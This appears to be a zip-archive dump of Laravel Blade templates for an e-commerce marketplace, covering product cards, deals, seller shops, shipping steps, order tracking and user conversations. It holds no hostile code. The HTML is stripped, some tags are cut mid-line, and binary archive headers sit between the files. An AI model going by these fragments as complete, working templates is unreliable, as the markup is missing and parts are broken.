    @php $product_url = route('product', $product->slug); if ($product->auction_product == 1) { $product_url = route('auction-product', $product->slug); } @endphp {{ $product->getTranslation('name') }} {{ $product->getTranslation('name') }} @php $badgeIndex = 0; @endphp @if (discount_in_percentage($product) > 0) -{{ discount_in_percentage($product) }}% @php $badgeIndex++; @endphp @endif @if ($product->wholesale_product) {{ translate('Wholesale') }} @php $badgeIndex++; @endphp @endif @php $customLabels = get_custom_labels($product->custom_label_id); @endphp @if ($customLabels) @foreach ($customLabels as $key => $customLabel) {{ $customLabel->text }} @php $badgeIndex++; @endphp @endforeach @endif @if ($product->auction_product == 0) @php $colors = is_string($product->colors) ? json_decode($product->colors, true) : $product->colors; $attributes = is_string($product->attributes) ? json_decode($product->attributes, true) : $product->attributes; @endphp @if ( (is_array($colors) && count($colors) > 0) || (is_array($attributes) && count($attributes) > 0) ) {{ translate('Select Option') }} @else {{ translate('Add to Cart') }} @endif @endif @if ( $product->auction_product == 1 && $product->auction_start_date <= strtotime('now') && $product->auction_end_date >= strtotime('now')) @php $carts = get_user_cart(); if (count($carts) > 0) { $cart_added = $carts->pluck('product_id')->toArray(); } $highest_bid = $product->bids->max('amount'); $min_bid_amount = $highest_bid != null ? $highest_bid + 1 : $product->starting_bid; $gst_rate = gst_applicable_product_rate($product->id); @endphp {{ translate('Place Bid') }} @endif

    {{ $product->getTranslation('name') }}

    @if ($product->auction_product == 0) @if (home_base_price($product) != home_discounted_base_price($product))
    {{ home_base_price($product) }}
    @endif
    {{ home_discounted_base_price($product) }}
    @endif @if ($product->auction_product == 1)
    {{ single_price($product->starting_bid) }}
    @endif
    PK�N]����%&%&9views/frontend/reclassic/partials/product_box_2.blade.phpnu�[���@php $cart_added = []; @endphp
    @php $product_url = route('product', $product->slug); if ($product->auction_product == 1) { $product_url = route('auction-product', $product->slug); } @endphp {{ $product->getTranslation('name') }} {{ $product->getTranslation('name') }} @php $badgeIndex = 0; @endphp @if (discount_in_percentage($product) > 0) -{{ discount_in_percentage($product) }}% @php $badgeIndex++; @endphp @endif @if ($product->wholesale_product) {{ translate('Wholesale') }} @php $badgeIndex++; @endphp @endif @php $customLabels = get_custom_labels($product->custom_label_id); @endphp @if ($customLabels) @foreach ($customLabels as $key => $customLabel) {{ $customLabel->text }} @php $badgeIndex++; @endphp @endforeach @endif @if ($product->auction_product == 0) @php $colors = is_string($product->colors) ? json_decode($product->colors, true) : $product->colors; $attributes = is_string($product->attributes) ? json_decode($product->attributes, true) : $product->attributes; @endphp @if ( (is_array($colors) && count($colors) > 0) || (is_array($attributes) && count($attributes) > 0) ) {{ translate('Select Option') }} @else {{ translate('Add to Cart') }} @endif @endif @if ( $product->auction_product == 1 && $product->auction_start_date <= strtotime('now') && $product->auction_end_date >= strtotime('now')) @php $carts = get_user_cart(); if (count($carts) > 0) { $cart_added = $carts->pluck('product_id')->toArray(); } $highest_bid = $product->bids->max('amount'); $min_bid_amount = $highest_bid != null ? $highest_bid + 1 : $product->starting_bid; $gst_rate = gst_applicable_product_rate($product->id); @endphp {{ translate('Place Bid') }} @endif

    {{ $product->getTranslation('name') }}

    @if ($product->auction_product == 0) @if (home_base_price($product) != home_discounted_base_price($product))
    {{ home_base_price($product) }}
    @endif
    {{ home_discounted_base_price($product) }}
    @endif @if ($product->auction_product == 1)
    {{ single_price($product->starting_bid) }}
    @endif
    PK�N]���I++7views/frontend/reclassic/partials/todays_deal.blade.phpnu�[���@if(count($todays_deal_products) > 0)
    @php $lang = get_system_language()->code; $todays_deal_banner = get_setting('todays_deal_banner', null, $lang); $todays_deal_banner_small = get_setting('todays_deal_banner_small', null, $lang); @endphp @if ($todays_deal_banner != null || $todays_deal_banner_small != null)
    {{ env('APP_NAME') }} promo
    {{ env('APP_NAME') }} promo
    @endif @php $todays_deal_banner_text_color = ((get_setting('todays_deal_banner_text_color') == 'light') || (get_setting('todays_deal_banner_text_color') == null)) ? 'text-white' : 'text-dark'; @endphp
    @endif PK�N]W�H���$views/frontend/seller_shop.blade.phpnu�[���@extends('frontend.layouts.app') @section('meta_title'){{ $shop->meta_title }}@stop @section('meta_description'){{ $shop->meta_description }}@stop @section('meta') @endsection @section('content')
    @php $followed_sellers = []; if (Auth::check()) { $followed_sellers = get_followed_sellers(); } @endphp @if (!isset($type) || $type == 'top-selling' || $type == 'cupons') @if ($shop->top_banner_image)
    {{ env('APP_NAME') }} offer
    @endif @endif
    {{ $shop->name }} @if ($shop->verification_status == 1) @else @endif
    {{ renderStarRating($shop->rating) }} ({{ $shop->num_of_reviews }} {{ translate('Reviews') }})
    {{ $shop->address }}
    {{ translate('Member Since') }}
    {{ date('d M Y',strtotime($shop->created_at)) }}
    @if ($shop->facebook || $shop->instagram || $shop->google || $shop->twitter || $shop->youtube)
    {{ translate('Social Media') }}
    @endif
    @if (!isset($type)) @php $feature_products = $shop->user->products->where('published', 1)->where('approved', 1)->where('seller_featured', 1); @endphp @if (count($feature_products) > 0) @endif @if ($shop->slider_images != null)
    @endif @php $coupons = get_coupons($shop->user->id); @endphp @if (count($coupons)>0)

    {{ translate('Coupons') }}

    @endif @if ($shop->banner_full_width_1_images) @php $shop_banner_full_width_1_images = get_slider_images(json_decode($shop->banner_full_width_1_images, true)); $shop_banner_full_width_1_links = json_decode($shop->banner_full_width_1_links, true); @endphp @foreach ($shop_banner_full_width_1_images as $key => $banner)
    @endforeach @endif @if($shop->banners_half_width_images) @php $shop_banners_half_width_images = get_slider_images(json_decode($shop->banners_half_width_images, true)); $shop_banners_half_width_links = json_decode($shop->banners_half_width_links, true); @endphp
    @foreach ($shop_banners_half_width_images as $key => $banner) @endforeach
    @endif @endif

    @if (!isset($type)) {{ translate('New Arrival Products')}} @elseif ($type == 'top-selling') {{ translate('Top Selling')}} @elseif ($type == 'cupons') {{ translate('All Cupons')}} @endif

    @if (!isset($type))
    @endif
    @php if (!isset($type)){ $products = get_seller_products($shop->user->id); } elseif ($type == 'top-selling'){ $products = get_shop_best_selling_products($shop->user->id); } elseif ($type == 'cupons'){ $coupons = get_coupons($shop->user->id , 24); } @endphp @if (!isset($type))
    @if ($shop->banner_full_width_2_images) @php $shop_banner_full_width_2_images = get_slider_images(json_decode($shop->banner_full_width_2_images, true)); $shop_banner_full_width_2_links = json_decode($shop->banner_full_width_2_links, true); @endphp @foreach ($shop_banner_full_width_2_images as $key => $banner) @endforeach @endif @elseif ($type == 'cupons')
    @foreach ($coupons as $key => $coupon)
    @include('frontend.partials.coupon_box',['coupon' => $coupon])
    @endforeach
    {{ $coupons->links() }}
    @elseif ($type == 'all-products')

    {{ translate('All Products') }}

    @foreach ($products as $key => $product)
    @include('frontend.'.get_setting('homepage_select').'.partials.product_box_1',['product' => $product])
    @endforeach
    {{ $products->appends(request()->input())->links() }}
    @elseif ($type == 'all-preorder-products')

    {{ translate('All Preorder Products') }}

    @foreach ($products as $key => $product)
    {{-- @include('frontend.'.get_setting('homepage_select').'.partials.product_box_1',['product' => $product]) --}} @include('preorder.frontend.product_box3',['product' => $product])
    @endforeach
    {{ $products->appends(request()->input())->links() }}
    @else
    @foreach ($products as $key => $product)
    @include('frontend.'.get_setting('homepage_select').'.partials.product_box_1',['product' => $product])
    @endforeach
    {{ $products->links() }}
    @endif
    @endsection @section('script') @endsection PK�N]��x�..9views/frontend/seller_shop_without_verification.blade.phpnu�[���@extends('frontend.layouts.app') @section('meta_title'){{ $shop->meta_title }}@stop @section('meta_description'){{ $shop->meta_description }}@stop @section('meta') @endsection @section('content') @php $total = 0; $rating = 0; foreach ($shop->user->products as $key => $seller_product) { $total += $seller_product->reviews->where('status', 1)->count(); $rating += $seller_product->reviews->where('status', 1)->sum('rating'); } @endphp
    {{ $shop->name }}
    {{ renderStarRating($shop->rating) }} ({{ $shop->num_of_reviews }} {{ translate('Reviews') }})
    {{ $shop->address }}
    {{ translate('Member Since') }}
    {{ date('d M Y',strtotime($shop->created_at)) }}

    {{$shop->user->name}} {{ translate('has not been verified yet.')}}

    @endsection PK�N]����'�'&views/frontend/shipping_info.blade.phpnu�[���@extends('frontend.layouts.app') @section('content')

    {{ translate('1. My Cart') }}

    {{ translate('2. Shipping info') }}

    {{ translate('3. Delivery info') }}

    {{ translate('4. Payment') }}

    {{ translate('5. Confirmation') }}

    @csrf
    @if(Auth::check()) @foreach (Auth::user()->addresses as $key => $address)
    @endforeach
    {{ translate('Add New Address') }}
    @else @include('frontend.partials.cart.guest_shipping_info') @endif
    @endsection @section('modal') @if(Auth::check()) @include('frontend.partials.address.address_modal') @endif @endsection @section('script') @include('frontend.partials.address.address_js') @endsection PK�N]�ou ��%views/frontend/shop_listing.blade.phpnu�[���@extends('frontend.layouts.app') @section('content')

    {{ translate('All Sellers') }}

    @foreach ($shops as $key => $shop) @if ($shop->user != null)
    {{ $shop->name }}
    @if ($shop->verification_status == 1) @else @endif

    {{ $shop->name }}

    {{ renderStarRating($shop->rating) }} ({{ $shop->num_of_reviews }} {{ translate('Reviews') }})
    {{ translate('Visit Store') }}
    @endif @endforeach
    {{ $shops->links() }}
    @endsection @section('script') @endsection PK�N]��/K��"views/frontend/smart_bar.blade.phpnu�[���@if (get_setting('smart_bar_status') != 0) @php $bg_color = get_setting('smart_bar_background_color') ?? '#fff'; $bg_design = get_setting('smart_bar_background_design') ?? 'plain'; $opacityStyle = $bg_design == 'plain' ? 'opacity: 1;' : 'opacity: .95;'; $button_color = get_setting('smart_bar_button_color') ?? '#0080ff'; $button_text_color = get_setting('smart_bar_button_text_color') ?? '#fff'; $text_color = get_setting('smart_bar_text_color') ?? '#000'; $colors = is_string($detailedProduct->colors) ? json_decode($detailedProduct->colors, true) : $detailedProduct->colors; $attributes = is_string($detailedProduct->attributes) ? json_decode($detailedProduct->attributes, true) : $detailedProduct->attributes; @endphp @endifPK�N] ��S����&views/frontend/thecore/index.blade.phpnu�[���@extends('frontend.layouts.app') @section('content') @php $lang = get_system_language()->code; @endphp
    @if (get_setting('home_slider_images', null, $lang) != null) @endif
    @php $flash_deal = get_featured_flash_deal(); @endphp @if ($flash_deal != null)
    Ends in: 00 days 00 hrs 00 min 00 sec
    @endif @if (count($hot_categories) > 0)
    {{ translate('Hot Categories') }}
    @endif
    @include('frontend.thecore.partials.featured_products')
    @if (count($featured_categories) > 0)
    @endif
    @php $best_selling_products = get_best_selling_products(20); @endphp @if (count($best_selling_products) > 0)

    {{ translate('Best Selling') }}

    {{translate('View All')}}
    @endif @php $todays_deal_products = get_todays_deal_products(20); @endphp @if (count($todays_deal_products) > 0)

    {{ translate('Todays Deal') }}

    View All
    @endif
    @php $homeBanner1Images = get_setting('home_banner1_images', null, $lang); @endphp @if ($homeBanner1Images != null)
    @php $banner_1_imags = json_decode($homeBanner1Images); $data_md = count($banner_1_imags) >= 2 ? 2 : 1; $home_banner1_links = get_setting('home_banner1_links', null, $lang); @endphp
    @endif @if (addon_is_activated('auction'))
    @endif @if (get_setting('classified_product') == 1) @php $classified_products = get_home_page_classified_products(); @endphp @if (count($classified_products) > 0)

    {{ translate('Classified Ads') }}

    {{translate('products')}} ({{count($classified_products)}})

    View All
    @endif @endif @if (addon_is_activated('preorder')) @include('preorder.frontend.home_page.thecore.newest_preorder') @endif @php $homeBanner2Images = get_setting('home_banner2_images', null, $lang); $homeBanner2SmallImages = get_setting('home_banner2_sm_images', null, $lang); @endphp @if ($homeBanner2Images != null)
    @php $banner_2_imags = json_decode($homeBanner2Images, true) ?? []; $banner_2_small_imags = json_decode($homeBanner2SmallImages, true) ?? []; $data_md = count($banner_2_imags) >= 2 ? 2 : 1; $data_small_md = count($banner_2_small_imags) >= 2 ? 2 : 1; $home_banner2_links = get_setting('home_banner2_links', null, $lang); @endphp
    @endif
    @endsection @section('script') @endsectionPK�N]��w�> > >views/frontend/thecore/partials/best_sellers_section.blade.phpnu�[���@if (get_setting('vendor_system_activation') == 1)

    {{ translate('Best Sellers')}}

    {{ translate('View All Sellers') }}
    @endif PK�N]��[-  >views/frontend/thecore/partials/best_selling_section.blade.phpnu�[���@php $best_selling_products = get_best_selling_products(20); @endphp @if (get_setting('best_selling') == 1 && count($best_selling_products) > 0)

    {{ translate('Best Selling') }}

    View All
    @endifPK�N]���r7views/frontend/thecore/partials/category_menu.blade.phpnu�[���
      @foreach (get_level_zero_categories()->take(10) as $key => $category) @php $category_name = $category->getTranslation('name'); @endphp
    • {{ $category_name }} {{ $category_name }}
    • @endforeach
    PK�N]0?'���;views/frontend/thecore/partials/featured_products.blade.phpnu�[��� @if (count(get_featured_products()) > 0)
    @endifPK�N]̏X�ccCviews/frontend/thecore/partials/featured_products_section.blade.phpnu�[���@if (count(get_featured_products()) > 0)

    {{ translate('Featured Products') }}

    @endifPK�N]g��O. . Aviews/frontend/thecore/partials/home_categories_section.blade.phpnu�[���@if (get_setting('home_categories') != null) @php $home_categories = json_decode(get_setting('home_categories')); $categories = get_category($home_categories); @endphp @foreach ($categories as $category_key => $category) @php $category_name = $category->getTranslation('name'); @endphp
    @endforeach @endifPK�N]��8 3 3:views/frontend/thecore/partials/home_product_box.blade.phpnu�[���@php $cart_added = []; @endphp
    @php $product_url = route('product', $product->slug); if ($product->auction_product == 1) { $product_url = route('auction-product', $product->slug); } @endphp {{ $product->getTranslation('name') }} {{ $product->getTranslation('name') }} @php $badgeIndex = 0; @endphp @if (discount_in_percentage($product) > 0) -{{ discount_in_percentage($product) }}% @php $badgeIndex++; @endphp @endif @if ($product->wholesale_product) {{ translate('Wholesale') }} @php $badgeIndex++; @endphp @endif @php $customLabels = get_custom_labels($product->custom_label_id); @endphp @if ($customLabels) @foreach ($customLabels as $key => $customLabel) {{ $customLabel->text }} @php $badgeIndex++; @endphp @endforeach @endif @if ($product->auction_product == 0)
    @php $colors = is_string($product->colors) ? json_decode($product->colors, true) : $product->colors; $attributes = is_string($product->attributes) ? json_decode($product->attributes, true) : $product->attributes; @endphp @if ( (is_array($colors) && count($colors) > 0) || (is_array($attributes) && count($attributes) > 0) ) @else @endif
    @php $colors = is_string($product->colors) ? json_decode($product->colors, true) : $product->colors; $attributes = is_string($product->attributes) ? json_decode($product->attributes, true) : $product->attributes; @endphp @if ( (is_array($colors) && count($colors) > 0) || (is_array($attributes) && count($attributes) > 0) ) {{ translate('Select Option') }} @else {{ translate('Add to Cart') }} @endif @endif @if ( $product->auction_product == 1 && $product->auction_start_date <= strtotime('now') && $product->auction_end_date >= strtotime('now')) @php $carts = get_user_cart(); if (count($carts) > 0) { $cart_added = $carts->pluck('product_id')->toArray(); } $highest_bid = $product->bids->max('amount'); $min_bid_amount = $highest_bid != null ? $highest_bid + 1 : $product->starting_bid; $gst_rate = gst_applicable_product_rate($product->id); @endphp {{ translate('Place Bid') }} @endif

    {{ $product->getTranslation('name') }}

    @if ($product->auction_product == 0) @if (home_base_price($product) != home_discounted_base_price($product))
    {{ home_base_price($product) }}
    @endif
    {{ home_discounted_base_price($product) }}
    @endif @if ($product->auction_product == 1)
    {{ single_price($product->starting_bid) }}
    @endif
    PK�N]��iȝ�Aviews/frontend/thecore/partials/last_view_product_box_1.blade.phpnu�[���@php $cart_added = []; @endphp
    @php $product_url = route('product', $product->slug); if ($product->auction_product == 1) { $product_url = route('auction-product', $product->slug); } @endphp {{ $product->getTranslation('name') }} {{ $product->getTranslation('name') }} @if (discount_in_percentage($product) > 0) -{{ discount_in_percentage($product) }}% @endif @if ($product->wholesale_product) {{ translate('Wholesale') }} @endif @if ($product->auction_product == 0) @endif @if ( $product->auction_product == 1 && $product->auction_start_date <= strtotime('now') && $product->auction_end_date >= strtotime('now')) @php $carts = get_user_cart(); if (count($carts) > 0) { $cart_added = $carts->pluck('product_id')->toArray(); } $highest_bid = $product->bids->max('amount'); $min_bid_amount = $highest_bid != null ? $highest_bid + 1 : $product->starting_bid; $gst_rate = gst_applicable_product_rate($product->id); @endphp {{ translate('Place Bid') }} @endif

    {{ $product->getTranslation('name') }}

    @if ($product->auction_product == 0) @if (home_base_price($product) != home_discounted_base_price($product))
    {{ home_base_price($product) }}
    @endif
    {{ home_discounted_base_price($product) }}
    @endif @if ($product->auction_product == 1)
    {{ single_price($product->starting_bid) }}
    @endif
    PK�N]p�S���Aviews/frontend/thecore/partials/newest_products_section.blade.phpnu�[���@if (count($newest_products) > 0)
    @foreach ($newest_products as $index => $new_product)
    @endforeach
    @endif PK�N]�|z��Cviews/frontend/thecore/partials/preorder_products_section.blade.phpnu�[���@if (count(get_featured_products()) > 0) @php $lang = get_system_language()->code; $homeBanner1Images = get_setting('featuredPreorder_images', null, $lang); $xxl_items = 6; $xl_items = 5; $lg_items = 4; $md_items = 3; if($homeBanner1Images != null){ $xxl_items = 5; $xl_items = 3.5; $lg_items = 3; $md_items = 1.5; } @endphp
    @if ($homeBanner1Images != null)
    @php $banner_1_imags = json_decode($homeBanner1Images); $home_banner1_links = get_setting('home_banner1_links', null, $lang); @endphp
    @endif
    @endifPK�N]�3x�0�07views/frontend/thecore/partials/product_box_1.blade.phpnu�[���@php $cart_added = []; @endphp
    @php $product_url = route('product', $product->slug); if ($product->auction_product == 1) { $product_url = route('auction-product', $product->slug); } @endphp {{ $product->getTranslation('name') }} {{ $product->getTranslation('name') }} @php $badgeIndex = 0; @endphp @if (discount_in_percentage($product) > 0) -{{ discount_in_percentage($product) }}% @php $badgeIndex++; @endphp @endif @if ($product->wholesale_product) {{ translate('Wholesale') }} @php $badgeIndex++; @endphp @endif @php $customLabels = get_custom_labels($product->custom_label_id); @endphp @if ($customLabels) @foreach ($customLabels as $key => $customLabel) {{ $customLabel->text }} @php $badgeIndex++; @endphp @endforeach @endif @if ($product->auction_product == 0) @php $colors = is_string($product->colors) ? json_decode($product->colors, true) : $product->colors; $attributes = is_string($product->attributes) ? json_decode($product->attributes, true) : $product->attributes; @endphp @if ( (is_array($colors) && count($colors) > 0) || (is_array($attributes) && count($attributes) > 0) ) {{ translate('Select Option') }} @else {{ translate('Add to Cart') }} @endif @endif @if ( $product->auction_product == 1 && $product->auction_start_date <= strtotime('now') && $product->auction_end_date >= strtotime('now')) @php $carts = get_user_cart(); if (count($carts) > 0) { $cart_added = $carts->pluck('product_id')->toArray(); } $highest_bid = $product->bids->max('amount'); $min_bid_amount = $highest_bid != null ? $highest_bid + 1 : $product->starting_bid; $gst_rate = gst_applicable_product_rate($product->id); @endphp {{ translate('Place Bid') }} @endif

    {{ $product->getTranslation('name') }}

    @if ($product->auction_product == 0) @if (home_base_price($product) != home_discounted_base_price($product))
    {{ home_base_price($product) }}
    @endif
    {{ home_discounted_base_price($product) }}
    @endif @if ($product->auction_product == 1)
    {{ single_price($product->starting_bid) }}
    @endif
    PK�N]�dP5 5 5views/frontend/thecore/partials/todays_deal.blade.phpnu�[��� @if (count($todays_deal_products) > 0)

    {{ translate('Todays Deal') }}

    View All
    @endif PK�N]�[4�  $views/frontend/todays_deal.blade.phpnu�[���@extends('frontend.layouts.app') @section('content')
    @php $lang = get_system_language()->code; $todays_deal_banner = get_setting('todays_deal_banner', null, $lang); $todays_deal_banner_small = get_setting('todays_deal_banner_small', null, $lang); @endphp @if ($todays_deal_banner != null || $todays_deal_banner_small != null)
    {{ env('APP_NAME') }} promo
    {{ env('APP_NAME') }} promo
    @endif
    @foreach ($todays_deal_products as $key => $product)
    @include('frontend.'.get_setting('homepage_select').'.partials.product_box_1',['product' => $product])
    @endforeach
    @endsection PK�N]Ҏ@����$views/frontend/track_order.blade.phpnu�[���@php $layout = 'frontend.layouts.app'; if (addon_is_activated('portfolio_system')) { $user = auth()->user(); if (!$user || $user->verification_status == 0 || optional($user->shop)->verification_status == 0) { $layout = 'frontend.layouts.portfolio_app'; } } $order_tracking = json_decode(get_setting('order_tracking'), true); $business_info = json_decode(get_setting('business_info'), true); @endphp @extends($layout) @section('content')

    {{ translate('Track Order') }}

    {{ translate('Check Your Order Status') }}

    @if (isset($order) && $order != null) @php $shippingAddress = json_decode($order->shipping_address, true); $status = $order->delivery_status; $isPaid = $order->payment_status == 'paid'; $isCOD = $order->payment_type == 'cash_on_delivery'; $isCancelled = $status == 'cancelled'; $statusUpdateTimes = []; if ($order->delivery_status_update_datetime) { $statusUpdateTimes = json_decode($order->delivery_status_update_datetime, true); } $seller = $order->seller_id ? \App\Models\User::find($order->seller_id) : null; if ($seller && $seller->user_type == 'seller') { $fromAddress = get_seller_address($order); } else { $fromAddress = ($business_info['address'] ?? '') . ', ' . ($business_info['state'] ?? '') . ', ' . ($business_info['country'] ?? ''); } $toAddress = ($shippingAddress['address'] ?? '') . ', ' . ($shippingAddress['city'] ?? '') . ', ' . ($shippingAddress['country'] ?? ''); $shippingName = null; if ($order->shipping_method == 'shiprocket') { $shippingName = 'Shiprocket'; } elseif ($order->shipping_method == 'steadfast') { $shippingName = 'Steadfast'; } elseif ($order->shipping_method == 'pathao') { $shippingName = 'Pathao'; } elseif ($order->shipping_method == 'redx') { $shippingName = 'redx'; } $isThirdParty = !is_null($shippingName); $normalSteps = [ 'pending' => 'Order Placed', 'confirmed' => 'Order Confirmed', 'picked_up' => 'Order Picked Up', 'on_the_way' => 'On The Way', 'delivered' => 'Delivered', ]; $normalStatusOrder = array_keys($normalSteps); if ($isCancelled) { $lastCompletedIndex = -1; foreach ($normalStatusOrder as $idx => $stepKey) { if (isset($statusUpdateTimes[$stepKey])) { $lastCompletedIndex = $idx; } } $currentIndex = $lastCompletedIndex; } else { $currentIndex = array_search($status, $normalStatusOrder); } function formatDateTime($dateTimeString) { if (!$dateTimeString) return null; try { $timestamp = is_numeric($dateTimeString) ? (int) $dateTimeString : strtotime($dateTimeString); if ($timestamp === false || $timestamp <= 0) return null; return [ 'date' => date('d M Y', $timestamp), 'time' => date('h.i A', $timestamp) ]; } catch (Exception $e) { return null; } } @endphp
    @if (isset($order_tracking['logo']) && $order_tracking['logo'] != '') Delivery Icon @else Delivery Icon @endif
    {{ isset($order_tracking['name']) && $order_tracking['name'] != '' ? $order_tracking['name'] : $business_info['company_name'] ?? 'Express Delivery' }}
    {{ isset($order_tracking['moto']) && $order_tracking['moto'] != '' ? $order_tracking['moto'] : 'From Checkout to Doorstep' }}

    {{ translate('From') }}

    {{ $fromAddress }}

    {{ translate('To') }}

    {{ $toAddress }}

    @if ($isThirdParty)
    @php $pendingTime = formatDateTime($statusUpdateTimes['pending'] ?? null); $confirmedTime = formatDateTime($statusUpdateTimes['confirmed'] ?? null); $pickedUpTime = formatDateTime($statusUpdateTimes['picked_up'] ?? null); $onTheWayTime = formatDateTime($statusUpdateTimes['on_the_way'] ?? null); $deliveredTime = formatDateTime($statusUpdateTimes['delivered'] ?? null); $cancelledTime = formatDateTime($statusUpdateTimes['cancelled'] ?? null); $paymentTime = formatDateTime($statusUpdateTimes['payment_time'] ?? null); @endphp
    {{ translate('Order Placed') }}
    @if ($isCOD) COD @endif
    {{ date('d M Y', $order->date) }} {{ date('h.i A', $order->date) }}
    @if ($isPaid && !$isCOD) @php $showPaymentLine = $status != 'pending'; @endphp
    @if ($showPaymentLine)
    @endif
    {{ translate('Payment Successful') }}
    @if ($paymentTime && $paymentTime['date']) {{ $paymentTime['date'] }} {{ $paymentTime['time'] }} @else {{ date('d M Y', $order->date) }} {{ date('h.i A', $order->date) }} @endif
    @endif @php $isConfirmed = in_array($status, ['confirmed', 'picked_up', 'on_the_way', 'delivered']) || ($isCancelled && isset($statusUpdateTimes['confirmed'])); $isConfirmedCurrent = !$isCancelled && $status == 'pending'; @endphp
    @if ($isConfirmed)
    @elseif($isConfirmedCurrent)
    @else
    @endif
    {{ translate('Order Confirmed') }}
    @if ($isConfirmed && $confirmedTime)
    {{ $confirmedTime['date'] }} {{ $confirmedTime['time'] }}
    @endif
    @php $assignedStatuses = ['picked_up', 'on_the_way', 'delivered']; $isAssigned = in_array($status, $assignedStatuses) || ($isCancelled && isset($statusUpdateTimes['picked_up'])); $isAssignedCurrent = !$isCancelled && in_array($status, ['confirmed']); @endphp
    @if ($isAssigned)
    @elseif($isAssignedCurrent)
    @else
    @endif
    {{ translate('Order Assigned to') }} {{ $shippingName }}
    @if ($isAssigned && $pickedUpTime)
    {{ $pickedUpTime['date'] }} {{ $pickedUpTime['time'] }}
    @endif
    @php $isDelivered = $status == 'delivered'; $isDeliveredRunning = !$isCancelled && $isAssigned && !$isDelivered; $finalLineClass = $isCancelled ? 'line-solid bg-danger' : ($isDelivered ? 'line-solid bg-success' : 'line-dashed'); @endphp
    @if ($isCancelled)
    @elseif ($isDelivered)
    @elseif($isDeliveredRunning)
    @else
    @endif
    @if($isCancelled)
    {{ translate('Order Cancelled') }}
    @if($cancelledTime)
    {{ $cancelledTime['date'] }} {{ $cancelledTime['time'] }}
    @endif @else
    {{ translate('Delivered') }}
    @if ($isDelivered && $deliveredTime)
    {{ $deliveredTime['date'] }} {{ $deliveredTime['time'] }}
    @endif @endif
    @else
    @php $allSteps = []; if ($isPaid && !$isCOD) { $allSteps[] = ['key' => 'payment', 'label' => 'Payment Successful']; } foreach ($normalSteps as $stepKey => $stepLabel) { if ($isCancelled) { if (isset($statusUpdateTimes[$stepKey])) { $allSteps[] = ['key' => $stepKey, 'label' => $stepLabel]; } } else { $allSteps[] = ['key' => $stepKey, 'label' => $stepLabel]; } if ($isCOD && $stepKey === 'delivered') { $allSteps[] = ['key' => 'payment', 'label' => 'Payment Successful']; } } if ($isCancelled) { $allSteps[] = ['key' => 'cancelled', 'label' => 'Order Cancelled']; } $reversedSteps = array_reverse($allSteps, true); $totalSteps = count($reversedSteps); $counter = 0; @endphp @foreach ($reversedSteps as $step) @php $counter++; $stepKey = $step['key']; $stepLabel = $step['label']; $isPaymentStep = ($stepKey == 'payment'); $isCancelledStep = ($stepKey == 'cancelled'); $isLastInUI = ($counter == $totalSteps); $showLine = !$isLastInUI; if ($isCancelledStep) { $isCompleted = true; $isCurrent = false; $stepTime = formatDateTime($statusUpdateTimes['cancelled'] ?? null); $lineClass = 'line-solid bg-danger'; } elseif ($isPaymentStep) { $isCompleted = $isCOD ? isset($statusUpdateTimes['delivered']) : ($isPaid && !$isCOD); $isCurrent = false; $stepTime = formatDateTime($statusUpdateTimes['payment_time'] ?? null); if (!$stepTime || !$stepTime['date']) { $stepTime = ['date' => date('d M Y', $order->date), 'time' => date('h.i A', $order->date)]; } $lineClass = $isCompleted ? 'line-solid bg-success' : 'line-dashed'; } else { $stepIndex = array_search($stepKey, $normalStatusOrder); $isCompleted = ($stepIndex <= $currentIndex); $isCurrent = !$isCancelled && ($stepIndex == $currentIndex + 1) && !$isCompleted; $stepTime = formatDateTime($statusUpdateTimes[$stepKey] ?? null); $lineClass = $isCompleted ? 'line-solid bg-success' : 'line-dashed'; } @endphp
    @if ($isCancelledStep)
    @elseif($isCurrent)
    @elseif($isCompleted)
    @else
    @endif
    @if ($showLine)
    @endif
    {{ translate($stepLabel) }}
    @if (!$isPaymentStep && !$isCancelledStep && $stepKey == 'pending' && $isCOD) COD @endif
    @if ($isCompleted || $isCurrent)
    @if ($stepTime && $stepTime['date']) {{ $stepTime['date'] }} {{ $stepTime['time'] }} @elseif(!$isPaymentStep && !$isCancelledStep && $stepKey == 'pending') {{ date('d M Y', $order->date) }} {{ date('h.i A', $order->date) }} @endif
    @endif
    @endforeach
    @endif
    @auth
    {{ translate('Order Summary') }}
    {{ translate('Order ID') }}: {{ $order->code }}
    {{ translate('Payment Method') }}: {{ ucfirst(str_replace('_', ' ', $order->payment_type)) }}
    {{ translate('Delivery Type') }}: {{ ucfirst(str_replace('_', ' ', $order->shipping_type)) }}
    {{ $order->orderDetails->count() }} {{ translate('Products') }}
    {{ translate('Total Amount') }}: {{ single_price($order->grand_total) }}
    @if ($isCOD && !$isPaid)
    {{ translate('Cash on Delivery: Pay') }} {{ single_price($order->grand_total) }} {{ translate('when your order arrives') }}
    @endif
    @else @endauth @else
    @if ($searched)

    {{ translate('No order found. Please check the code and try again.') }}

    @endif
    Map Img
    @endif
    @endsectionPK�N]��C9bb1views/frontend/user/conversations/index.blade.phpnu�[���@extends('frontend.layouts.user_panel') @section('panel_content')
    {{ translate('Conversations')}}

    {{ translate('Select a conversation to view all messages')}}

    @if (count($conversations) > 0)
      @foreach ($conversations as $key => $conversation) @if ($conversation->receiver != null && $conversation->sender != null)
    • @if (Auth::user()->id == $conversation->sender_id) @if ($conversation->receiver->shop != null) @else receiver->avatar_original == null) src="{{ static_asset('assets/img/avatar-place.png') }}" @else src="{{ uploaded_asset($conversation->receiver->avatar_original) }}" @endif onerror="this.onerror=null;this.src='{{ static_asset('assets/img/avatar-place.png') }}';"> @endif @else sender->avatar_original == null) src="{{ static_asset('assets/img/avatar-place.png') }}" @else src="{{ uploaded_asset($conversation->sender->avatar_original) }}" @endif class="rounded-circle" onerror="this.onerror=null;this.src='{{ static_asset('assets/img/avatar-place.png') }}';"> @endif
      @if (Auth::user()->id == $conversation->sender_id)
      @if ($conversation->receiver->shop != null) {{ $conversation->receiver->shop->name }} @else {{ $conversation->receiver->name }} @endif
      @else
      {{ $conversation->sender->name }}
      @endif {{ date('d.m.Y h:i:m', strtotime($conversation->messages->last()->created_at)) }}
      {{ $conversation->title }} @if ((Auth::user()->id == $conversation->sender_id && $conversation->sender_viewed == 0) || (Auth::user()->id == $conversation->receiver_id && $conversation->receiver_viewed == 0)) {{ translate('New') }} @endif

      {{ $conversation->messages->last()->message }}

    • @endif @endforeach
    @else
    Image
    {{ translate("There isn't anything added yet")}}
    @endif
    {{ $conversations->links() }}
    @endsection PK�N]�qu�]]0views/frontend/user/conversations/show.blade.phpnu�[���@extends('frontend.layouts.user_panel') @section('panel_content')
    {{ translate('Conversations With ')}} @if ($conversation->sender_id == Auth::user()->id && $conversation->receiver->shop != null) {{ $conversation->receiver->shop->name }} @endif
    {{ $conversation->title }}

